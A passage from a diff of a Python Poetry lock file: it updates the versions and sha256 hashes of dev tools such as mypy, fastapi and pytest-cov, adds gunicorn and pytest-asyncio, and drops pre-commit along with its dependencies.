+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:de5695a6f1d8340b12a5d6d4484290ee74d61e467c39ff03b39e30df62cf83a0"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1c60b9c202d00052183c9be85e5eaf18a4ada0a47d188a83c8f5c5b23252f649"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:f645caaf0008bacf349875a974220f1f1da349c5dbe7c4ec93048cdc785a3326"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:ea9f9c6034ea2d93d9147818f17c2a0860d41b71c38b9ce4d55f21b6f9165a11"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:80d1543d58bd3d6c271b66abf454d437a438dff01c3e62fdbcd68f2a11310d4b"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:73dc03a6a7e30b7edc5b01b601e53e7fc924b04e1835e8e407c12c037e81adbd"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6f5c2e7bc8a4bf7c426599765b1bd33217ec84023033672c1e9a8b35eaeaaaf8"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-win32.whl", hash = "sha256:12a2b561af122e3d94cdb97fe6fb2bb2b82cef0cdca131646fdb940a1eda04f0"},
+ {file = "charset_normalizer-3.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:3160a0fd9754aab7d47f95a6b63ab355388d890163eb03b2d2b87ab0a30cfa59"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:38e812a197bf8e71a59fe55b757a84c1f946d0ac114acafaafaf21667a7e169e"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6baf0baf0d5d265fa7944feb9f7451cc316bfe30e8df1a61b1bb08577c554f31"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:8f25e17ab3039b05f762b0a55ae0b3632b2e073d9c8fc88e89aca31a6198e88f"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3747443b6a904001473370d7810aa19c3a180ccd52a7157aacc264a5ac79265e"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b116502087ce8a6b7a5f1814568ccbd0e9f6cfd99948aa59b0e241dc57cf739f"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d16fd5252f883eb074ca55cb622bc0bee49b979ae4e8639fff6ca3ff44f9f854"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21fa558996782fc226b529fdd2ed7866c2c6ec91cee82735c98a197fae39f706"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f6c7a8a57e9405cad7485f4c9d3172ae486cfef1344b5ddd8e5239582d7355e"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ac3775e3311661d4adace3697a52ac0bab17edd166087d493b52d4f4f553f9f0"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:10c93628d7497c81686e8e5e557aafa78f230cd9e77dd0c40032ef90c18f2230"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:6f4f4668e1831850ebcc2fd0b1cd11721947b6dc7c00bf1c6bd3c929ae14f2c7"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:0be65ccf618c1e7ac9b849c315cc2e8a8751d9cfdaa43027d4f6624bd587ab7e"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:53d0a3fa5f8af98a1e261de6a3943ca631c526635eb5817a87a59d9a57ebf48f"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-win32.whl", hash = "sha256:a04f86f41a8916fe45ac5024ec477f41f886b3c435da2d4e3d2709b22ab02af1"},
+ {file = "charset_normalizer-3.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:830d2948a5ec37c386d3170c483063798d7879037492540f10a475e3fd6f244b"},
+ {file = "charset_normalizer-3.1.0-py3-none-any.whl", hash = "sha256:3d9098b479e78c85080c98e1e35ff40b4a31d8953102bb0fd7d1b6f8a2111a3d"},
]
[[package]]
@@ -333,35 +322,23 @@ toml = ["tomli"]
[[package]]
name = "devtools"
-version = "0.9.0"
+version = "0.10.0"
description = "Python's missing debug print command, and more."
category = "dev"
optional = false
python-versions = ">=3.7"
files = [
- {file = "devtools-0.9.0-py3-none-any.whl", hash = "sha256:689cf4e7c75024237c42093ba19f4fa9cf15980269f02463aeab4d97d4b0a215"},
- {file = "devtools-0.9.0.tar.gz", hash = "sha256:86ede6e0273e023db766344d14098228785b48a80f31716f28e8b9453d52fa1e"},
+ {file = "devtools-0.10.0-py3-none-any.whl", hash = "sha256:b0bc02043bb032cdfb93e227226e2fea1aaea8f5a31fca25fabc4eadca22f228"},
+ {file = "devtools-0.10.0.tar.gz", hash = "sha256:6eb7c4fa7c4b90e5cfe623537a9961d1dc3199d8be0981802c6931cd8f02418f"},
]
[package.dependencies]
asttokens = ">=2.0.0,<3.0.0"
-executing = ">=0.8.0,<1.0.0"
+executing = ">=1.1.1"
[package.extras]
pygments = ["pygments (>=2.2.0)"]
-[[package]]
-name = "distlib"
-version = "0.3.6"
-description = "Distribution utilities"
-category = "dev"
-optional = false
-python-versions = "*"
-files = [
- {file = "distlib-0.3.6-py2.py3-none-any.whl", hash = "sha256:f35c4b692542ca110de7ef0bea44d73981caeb34ca0b9b6b2e6d7790dda8f80e"},
- {file = "distlib-0.3.6.tar.gz", hash = "sha256:14bad2d9b04d3a36127ac97f30b12a19268f211063d8f8ee4f47108896e11b46"},
-]
-
[[package]]
name = "exceptiongroup"
version = "1.1.0"
@@ -379,26 +356,29 @@ test = ["pytest (>=6)"]
[[package]]
name = "executing"
-version = "0.10.0"
+version = "1.2.0"
description = "Get the currently executing AST node of a frame, and other information"
category = "dev"
optional = false
python-versions = "*"
files = [
- {file = "executing-0.10.0-py2.py3-none-any.whl", hash = "sha256:9c745f80cda11eb22b62cbecf21156491a794eb56ab06f9d286a44e62822b24e"},
- {file = "executing-0.10.0.tar.gz", hash = "sha256:d1cd87c2e371e9966261410c5b3769d6df2f9e4a79a83eebd2662dd3388f9833"},
+ {file = "executing-1.2.0-py2.py3-none-any.whl", hash = "sha256:0314a69e37426e3608aada02473b4161d4caf5a4b244d1d0c48072b8fee7bacc"},
+ {file = "executing-1.2.0.tar.gz", hash = "sha256:19da64c18d2d851112f09c287f8d3dbbdf725ab0e569077efb6cdcbd3497c107"},
]
+[package.extras]
+tests = ["asttokens", "littleutils", "pytest", "rich"]
+
[[package]]
name = "fastapi"
-version = "0.92.0"
+version = "0.93.0"
description = "FastAPI framework, high performance, easy to learn, fast to code, ready for production"
category = "main"
optional = false
python-versions = ">=3.7"
files = [
- {file = "fastapi-0.92.0-py3-none-any.whl", hash = "sha256:ae7b97c778e2f2ec3fb3cb4fb14162129411d99907fb71920f6d69a524340ebf"},
- {file = "fastapi-0.92.0.tar.gz", hash = "sha256:023a0f5bd2c8b2609014d3bba1e14a1d7df96c6abea0a73070621c9862b9a4de"},
+ {file = "fastapi-0.93.0-py3-none-any.whl", hash = "sha256:d6e6db5f096d67b475e2a09e1124983554f634fad50297de85fc3de0583df13a"},
+ {file = "fastapi-0.93.0.tar.gz", hash = "sha256:c2944febec6da706f4c82cdfa0de48afda960c8fbde29dec88697d55a67d7718"},
]
[package.dependencies]
@@ -408,25 +388,9 @@ starlette = ">=0.25.0,<0.26.0"
[package.extras]
all = ["email-validator (>=1.1.1)", "httpx (>=0.23.0)", "itsdangerous (>=1.1.0)", "jinja2 (>=2.11.2)", "orjson (>=3.2.1)", "python-multipart (>=0.0.5)", "pyyaml (>=5.3.1)", "ujson (>=4.0.1,!=4.0.2,!=4.1.0,!=4.2.0,!=4.3.0,!=5.0.0,!=5.1.0)", "uvicorn[standard] (>=0.12.0)"]
dev = ["pre-commit (>=2.17.0,<3.0.0)", "ruff (==0.0.138)", "uvicorn[standard] (>=0.12.0,<0.21.0)"]
-doc = ["mdx-include (>=1.4.1,<2.0.0)", "mkdocs (>=1.1.2,<2.0.0)", "mkdocs-markdownextradata-plugin (>=0.1.7,<0.3.0)", "mkdocs-material (>=8.1.4,<9.0.0)", "pyyaml (>=5.3.1,<7.0.0)", "typer[all] (>=0.6.1,<0.8.0)"]
+doc = ["mdx-include (>=1.4.1,<2.0.0)", "mkdocs (>=1.1.2,<2.0.0)", "mkdocs-markdownextradata-plugin (>=0.1.7,<0.3.0)", "mkdocs-material (>=8.1.4,<9.0.0)", "pyyaml (>=5.3.1,<7.0.0)", "typer-cli (>=0.0.13,<0.0.14)", "typer[all] (>=0.6.1,<0.8.0)"]
test = ["anyio[trio] (>=3.2.1,<4.0.0)", "black (==22.10.0)", "coverage[toml] (>=6.5.0,<8.0)", "databases[sqlite] (>=0.3.2,<0.7.0)", "email-validator (>=1.1.1,<2.0.0)", "flask (>=1.1.2,<3.0.0)", "httpx (>=0.23.0,<0.24.0)", "isort (>=5.0.6,<6.0.0)", "mypy (==0.982)", "orjson (>=3.2.1,<4.0.0)", "passlib[bcrypt] (>=1.7.2,<2.0.0)", "peewee (>=3.13.3,<4.0.0)", "pytest (>=7.1.3,<8.0.0)", "python-jose[cryptography] (>=3.3.0,<4.0.0)", "python-multipart (>=0.0.5,<0.0.6)", "pyyaml (>=5.3.1,<7.0.0)", "ruff (==0.0.138)", "sqlalchemy (>=1.3.18,<1.4.43)", "types-orjson (==3.6.2)", "types-ujson (==5.6.0.0)", "ujson (>=4.0.1,!=4.0.2,!=4.1.0,!=4.2.0,!=4.3.0,!=5.0.0,!=5.1.0,<6.0.0)"]
-[[package]]
-name = "filelock"
-version = "3.9.0"
-description = "A platform independent file lock."
-category = "dev"
-optional = false
-python-versions = ">=3.7"
-files = [
- {file = "filelock-3.9.0-py3-none-any.whl", hash = "sha256:f58d535af89bb9ad5cd4df046f741f8553a418c01a7856bf0d173bbc9f6bd16d"},
- {file = "filelock-3.9.0.tar.gz", hash = "sha256:7b319f24340b51f55a2bf7a12ac0755a9b03e718311dac567a0f4f7fabd2f5de"},
-]
-
-[package.extras]
-docs = ["furo (>=2022.12.7)", "sphinx (>=5.3)", "sphinx-autodoc-typehints (>=1.19.5)"]
-testing = ["covdefaults (>=2.2.2)", "coverage (>=7.0.1)", "pytest (>=7.2)", "pytest-cov (>=4)", "pytest-timeout (>=2.1)"]
-
[[package]]
name = "flake8"
version = "5.0.4"
@@ -445,6 +409,27 @@ mccabe = ">=0.7.0,<0.8.0"
pycodestyle = ">=2.9.0,<2.10.0"
pyflakes = ">=2.5.0,<2.6.0"
+[[package]]
+name = "gunicorn"
+version = "20.1.0"
+description = "WSGI HTTP Server for UNIX"
+category = "dev"
+optional = false
+python-versions = ">=3.5"
+files = [
+ {file = "gunicorn-20.1.0-py3-none-any.whl", hash = "sha256:9dcc4547dbb1cb284accfb15ab5667a0e5d1881cc443e0677b4882a4067a807e"},
+ {file = "gunicorn-20.1.0.tar.gz", hash = "sha256:e0a968b5ba15f8a328fdfd7ab1fcb5af4470c28aaf7e55df02a99bc13138e6e8"},
+]
+
+[package.dependencies]
+setuptools = ">=3.0"
+
+[package.extras]
+eventlet = ["eventlet (>=0.24.1)"]
+gevent = ["gevent (>=1.4.0)"]
+setproctitle = ["setproctitle"]
+tornado = ["tornado (>=0.2)"]
+
[[package]]
name = "h11"
version = "0.14.0"
@@ -506,21 +491,6 @@ cli = ["click (>=8.0.0,<9.0.0)", "pygments (>=2.0.0,<3.0.0)", "rich (>=10,<13)"]
http2 = ["h2 (>=3,<5)"]
socks = ["socksio (>=1.0.0,<2.0.0)"]
-[[package]]
-name = "identify"
-version = "2.5.18"
-description = "File identification library for Python"
-category = "dev"
-optional = false
-python-versions = ">=3.7"
-files = [
- {file = "identify-2.5.18-py2.py3-none-any.whl", hash = "sha256:93aac7ecf2f6abf879b8f29a8002d3c6de7086b8c28d88e1ad15045a15ab63f9"},
- {file = "identify-2.5.18.tar.gz", hash = "sha256:89e144fa560cc4cffb6ef2ab5e9fb18ed9f9b3cb054384bab4b95c12f6c309fe"},
-]
-
-[package.extras]
-license = ["ukkonen"]
-
[[package]]
name = "idna"
version = "3.4"
@@ -597,45 +567,49 @@ files = [
[[package]]
name = "mypy"
-version = "0.971"
+version = "1.1.1"
description = "Optional static typing for Python"
category = "dev"
optional = false
-python-versions = ">=3.6"
+python-versions = ">=3.7"
files = [
- {file = "mypy-0.971-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:f2899a3cbd394da157194f913a931edfd4be5f274a88041c9dc2d9cdcb1c315c"},
- {file = "mypy-0.971-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:98e02d56ebe93981c41211c05adb630d1d26c14195d04d95e49cd97dbc046dc5"},
- {file = "mypy-0.971-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:19830b7dba7d5356d3e26e2427a2ec91c994cd92d983142cbd025ebe81d69cf3"},
- {file = "mypy-0.971-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:02ef476f6dcb86e6f502ae39a16b93285fef97e7f1ff22932b657d1ef1f28655"},
- {file = "mypy-0.971-cp310-cp310-win_amd64.whl", hash = "sha256:25c5750ba5609a0c7550b73a33deb314ecfb559c350bb050b655505e8aed4103"},
- {file = "mypy-0.971-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:d3348e7eb2eea2472db611486846742d5d52d1290576de99d59edeb7cd4a42ca"},
- {file = "mypy-0.971-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:3fa7a477b9900be9b7dd4bab30a12759e5abe9586574ceb944bc29cddf8f0417"},
- {file = "mypy-0.971-cp36-cp36m-win_amd64.whl", hash = "sha256:2ad53cf9c3adc43cf3bea0a7d01a2f2e86db9fe7596dfecb4496a5dda63cbb09"},
- {file = "mypy-0.971-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:855048b6feb6dfe09d3353466004490b1872887150c5bb5caad7838b57328cc8"},
- {file = "mypy-0.971-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:23488a14a83bca6e54402c2e6435467a4138785df93ec85aeff64c6170077fb0"},
- {file = "mypy-0.971-cp37-cp37m-win_amd64.whl", hash = "sha256:4b21e5b1a70dfb972490035128f305c39bc4bc253f34e96a4adf9127cf943eb2"},
- {file = "mypy-0.971-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:9796a2ba7b4b538649caa5cecd398d873f4022ed2333ffde58eaf604c4d2cb27"},
- {file = "mypy-0.971-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5a361d92635ad4ada1b1b2d3630fc2f53f2127d51cf2def9db83cba32e47c856"},
- {file = "mypy-0.971-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b793b899f7cf563b1e7044a5c97361196b938e92f0a4343a5d27966a53d2ec71"},
- {file = "mypy-0.971-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d1ea5d12c8e2d266b5fb8c7a5d2e9c0219fedfeb493b7ed60cd350322384ac27"},
- {file = "mypy-0.971-cp38-cp38-win_amd64.whl", hash = "sha256:23c7ff43fff4b0df93a186581885c8512bc50fc4d4910e0f838e35d6bb6b5e58"},
- {file = "mypy-0.971-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:1f7656b69974a6933e987ee8ffb951d836272d6c0f81d727f1d0e2696074d9e6"},
- {file = "mypy-0.971-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d2022bfadb7a5c2ef410d6a7c9763188afdb7f3533f22a0a32be10d571ee4bbe"},
- {file = "mypy-0.971-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ef943c72a786b0f8d90fd76e9b39ce81fb7171172daf84bf43eaf937e9f220a9"},
- {file = "mypy-0.971-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d744f72eb39f69312bc6c2abf8ff6656973120e2eb3f3ec4f758ed47e414a4bf"},
- {file = "mypy-0.971-cp39-cp39-win_amd64.whl", hash = "sha256:77a514ea15d3007d33a9e2157b0ba9c267496acf12a7f2b9b9f8446337aac5b0"},
- {file = "mypy-0.971-py3-none-any.whl", hash = "sha256:0d054ef16b071149917085f51f89555a576e2618d5d9dd70bd6eea6410af3ac9"},
- {file = "mypy-0.971.tar.gz", hash = "sha256:40b0f21484238269ae6a57200c807d80debc6459d444c0489a102d7c6a75fa56"},
+ {file = "mypy-1.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:39c7119335be05630611ee798cc982623b9e8f0cff04a0b48dfc26100e0b97af"},
+ {file = "mypy-1.1.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:61bf08362e93b6b12fad3eab68c4ea903a077b87c90ac06c11e3d7a09b56b9c1"},
+ {file = "mypy-1.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dbb19c9f662e41e474e0cff502b7064a7edc6764f5262b6cd91d698163196799"},
+ {file = "mypy-1.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:315ac73cc1cce4771c27d426b7ea558fb4e2836f89cb0296cbe056894e3a1f78"},
+ {file = "mypy-1.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:5cb14ff9919b7df3538590fc4d4c49a0f84392237cbf5f7a816b4161c061829e"},
+ {file = "mypy-1.1.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:26cdd6a22b9b40b2fd71881a8a4f34b4d7914c679f154f43385ca878a8297389"},
+ {file = "mypy-1.1.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:5b5f81b40d94c785f288948c16e1f2da37203c6006546c5d947aab6f90aefef2"},
+ {file = "mypy-1.1.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21b437be1c02712a605591e1ed1d858aba681757a1e55fe678a15c2244cd68a5"},
+ {file = "mypy-1.1.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d809f88734f44a0d44959d795b1e6f64b2bbe0ea4d9cc4776aa588bb4229fc1c"},
+ {file = "mypy-1.1.1-cp311-cp311-win_amd64.whl", hash = "sha256:a380c041db500e1410bb5b16b3c1c35e61e773a5c3517926b81dfdab7582be54"},
+ {file = "mypy-1.1.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b7c7b708fe9a871a96626d61912e3f4ddd365bf7f39128362bc50cbd74a634d5"},
+ {file = "mypy-1.1.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c1c10fa12df1232c936830839e2e935d090fc9ee315744ac33b8a32216b93707"},
+ {file = "mypy-1.1.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:0a28a76785bf57655a8ea5eb0540a15b0e781c807b5aa798bd463779988fa1d5"},
+ {file = "mypy-1.1.1-cp37-cp37m-win_amd64.whl", hash = "sha256:ef6a01e563ec6a4940784c574d33f6ac1943864634517984471642908b30b6f7"},
+ {file = "mypy-1.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:d64c28e03ce40d5303450f547e07418c64c241669ab20610f273c9e6290b4b0b"},
+ {file = "mypy-1.1.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:64cc3afb3e9e71a79d06e3ed24bb508a6d66f782aff7e56f628bf35ba2e0ba51"},
+ {file = "mypy-1.1.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ce61663faf7a8e5ec6f456857bfbcec2901fbdb3ad958b778403f63b9e606a1b"},
+ {file = "mypy-1.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:2b0c373d071593deefbcdd87ec8db91ea13bd8f1328d44947e88beae21e8d5e9"},
+ {file = "mypy-1.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:2888ce4fe5aae5a673386fa232473014056967f3904f5abfcf6367b5af1f612a"},
+ {file = "mypy-1.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:19ba15f9627a5723e522d007fe708007bae52b93faab00f95d72f03e1afa9598"},
+ {file = "mypy-1.1.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:59bbd71e5c58eed2e992ce6523180e03c221dcd92b52f0e792f291d67b15a71c"},
+ {file = "mypy-1.1.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9401e33814cec6aec8c03a9548e9385e0e228fc1b8b0a37b9ea21038e64cdd8a"},
+ {file = "mypy-1.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:4b398d8b1f4fba0e3c6463e02f8ad3346f71956b92287af22c9b12c3ec965a9f"},
+ {file = "mypy-1.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:69b35d1dcb5707382810765ed34da9db47e7f95b3528334a3c999b0c90fe523f"},
+ {file = "mypy-1.1.1-py3-none-any.whl", hash = "sha256:4e4e8b362cdf99ba00c2b218036002bdcdf1e0de085cdb296a49df03fb31dfc4"},
+ {file = "mypy-1.1.1.tar.gz", hash = "sha256:ae9ceae0f5b9059f33dbc62dea087e942c0ccab4b7a003719cb70f9b8abfa32f"},
]
[package.dependencies]
-mypy-extensions = ">=0.4.3"
+mypy-extensions = ">=1.0.0"
tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
typed-ast = {version = ">=1.4.0,<2", markers = "python_version < \"3.8\""}
typing-extensions = ">=3.10"
[package.extras]
dmypy = ["psutil (>=4.0)"]
+install-types = ["pip"]
python2 = ["typed-ast (>=1.4.0,<2)"]
reports = ["lxml"]
@@ -651,21 +625,6 @@ files = [
{file = "mypy_extensions-1.0.0.tar.gz", hash = "sha256:75dbf8955dc00442a438fc4d0666508a9a97b6bd41aa2f0ffe9d2f2725af0782"},
]
-[[package]]
-name = "nodeenv"
-version = "1.7.0"
-description = "Node.js virtual environment builder"
-category = "dev"
-optional = false
-python-versions = ">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*"
-files = [
- {file = "nodeenv-1.7.0-py2.py3-none-any.whl", hash = "sha256:27083a7b96a25f2f5e1d8cb4b6317ee8aeda3bdd121394e5ac54e498028a042e"},
- {file = "nodeenv-1.7.0.tar.gz", hash = "sha256:e0e7f7dfb85fc5394c6fe1e8fa98131a2473e04311a45afb6508f7cf1836fa2b"},
-]
-
-[package.dependencies]
-setuptools = "*"
-
[[package]]
name = "packaging"
version = "23.0"
@@ -692,22 +651,22 @@ files = [
[[package]]
name = "platformdirs"
-version = "2.6.2"
+version = "3.1.0"
description = "A small Python package for determining appropriate platform-specific dirs, e.g. a \"user data dir\"."
category = "dev"
optional = false
python-versions = ">=3.7"
files = [
- {file = "platformdirs-2.6.2-py3-none-any.whl", hash = "sha256:83c8f6d04389165de7c9b6f0c682439697887bca0aa2f1c87ef1826be3584490"},
- {file = "platformdirs-2.6.2.tar.gz", hash = "sha256:e1fea1fe471b9ff8332e229df3cb7de4f53eeea4998d3b6bfff542115e998bd2"},
+ {file = "platformdirs-3.1.0-py3-none-any.whl", hash = "sha256:13b08a53ed71021350c9e300d4ea8668438fb0046ab3937ac9a29913a1a1350a"},
+ {file = "platformdirs-3.1.0.tar.gz", hash = "sha256:accc3665857288317f32c7bebb5a8e482ba717b474f3fc1d18ca7f9214be0cef"},
]
[package.dependencies]
typing-extensions = {version = ">=4.4", markers = "python_version < \"3.8\""}
[package.extras]
-docs = ["furo (>=2022.12.7)", "proselint (>=0.13)", "sphinx (>=5.3)", "sphinx-autodoc-typehints (>=1.19.5)"]
-test = ["appdirs (==1.4.4)", "covdefaults (>=2.2.2)", "pytest (>=7.2)", "pytest-cov (>=4)", "pytest-mock (>=3.10)"]
+docs = ["furo (>=2022.12.7)", "proselint (>=0.13)", "sphinx (>=6.1.3)", "sphinx-autodoc-typehints (>=1.22,!=1.23.4)"]
+test = ["appdirs (==1.4.4)", "covdefaults (>=2.2.2)", "pytest (>=7.2.1)", "pytest-cov (>=4)", "pytest-mock (>=3.10)"]
[[package]]
name = "pluggy"
@@ -728,26 +687,6 @@ importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""}
dev = ["pre-commit", "tox"]
testing = ["pytest", "pytest-benchmark"]
-[[package]]
-name = "pre-commit"
-version = "2.21.0"
-description = "A framework for managing and maintaining multi-language pre-commit hooks."
-category = "dev"
-optional = false
-python-versions = ">=3.7"
-files = [
- {file = "pre_commit-2.21.0-py2.py3-none-any.whl", hash = "sha256:e2f91727039fc39a92f58a588a25b87f936de6567eed4f0e673e0507edc75bad"},
- {file = "pre_commit-2.21.0.tar.gz", hash = "sha256:31ef31af7e474a8d8995027fefdfcf509b5c913ff31f2015b4ec4beb26a6f658"},
-]
-
-[package.dependencies]
-cfgv = ">=2.0.0"
-identify = ">=1.0.0"
-importlib-metadata = {version = "*", markers = "python_version < \"3.8\""}
-nodeenv = ">=0.11.1"
-pyyaml = ">=5.1"
-virtualenv = ">=20.10.0"
-
[[package]]
name = "prometheus-client"
version = "0.16.0"
@@ -865,16 +804,36 @@ tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
[package.extras]
testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "xmlschema"]
+[[package]]
+name = "pytest-asyncio"
+version = "0.20.3"
+description = "Pytest support for asyncio"
+category = "dev"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "pytest-asyncio-0.20.3.tar.gz", hash = "sha256:83cbf01169ce3e8eb71c6c278ccb0574d1a7a3bb8eaaf5e50e0ad342afb33b36"},
+ {file = "pytest_asyncio-0.20.3-py3-none-any.whl", hash = "sha256:f129998b209d04fcc65c96fc85c11e5316738358909a8399e93be553d7656442"},
+]
+
+[package.dependencies]
+pytest = ">=6.1.0"
+typing-extensions = {version = ">=3.7.2", markers = "python_version < \"3.8\""}
+
+[package.extras]
+docs = ["sphinx (>=5.3)", "sphinx-rtd-theme (>=1.0)"]
+testing = ["coverage (>=6.2)", "flaky (>=3.5.0)", "hypothesis (>=5.7.1)", "mypy (>=0.931)", "pytest-trio (>=0.7.0)"]
+
[[package]]
name = "pytest-cov"
-version = "3.0.0"
+version = "4.0.0"
description = "Pytest plugin for measuring coverage."
category = "dev"
optional = false
python-versions = ">=3.6"
files = [
- {file = "pytest-cov-3.0.0.tar.gz", hash = "sha256:e7f0f5b1617d2210a2cabc266dfe2f4c75a8d32fb89eafb7ad9d06f6d076d470"},
- {file = "pytest_cov-3.0.0-py3-none-any.whl", hash = "sha256:578d5d15ac4a25e5f961c938b85a05b09fdaae9deef3bb6de9a6e766622ca7a6"},
+ {file = "pytest-cov-4.0.0.tar.gz", hash = "sha256:996b79efde6433cdbd0088872dbc5fb3ed7fe1578b68cdbba634f14bb8dd0470"},
+ {file = "pytest_cov-4.0.0-py3-none-any.whl", hash = "sha256:2feb1b751d66a8bd934e5edfa2e961d11309dc37b73b0eabe73b5945fee20f6b"},
]
[package.dependencies]
@@ -908,56 +867,6 @@ gendocs = ["pytoolconfig[doc]", "sphinx (>=4.5.0)", "sphinx-autodoc-typehints (>
global = ["platformdirs (>=1.4.4)"]
validation = ["pydantic (>=1.7.4)"]
-[[package]]
-name = "pyyaml"
-version = "6.0"
-description = "YAML parser and emitter for Python"
-category = "dev"
-optional = false
-python-versions = ">=3.6"
-files = [
- {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"},
- {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"},
- {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"},
- {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"},
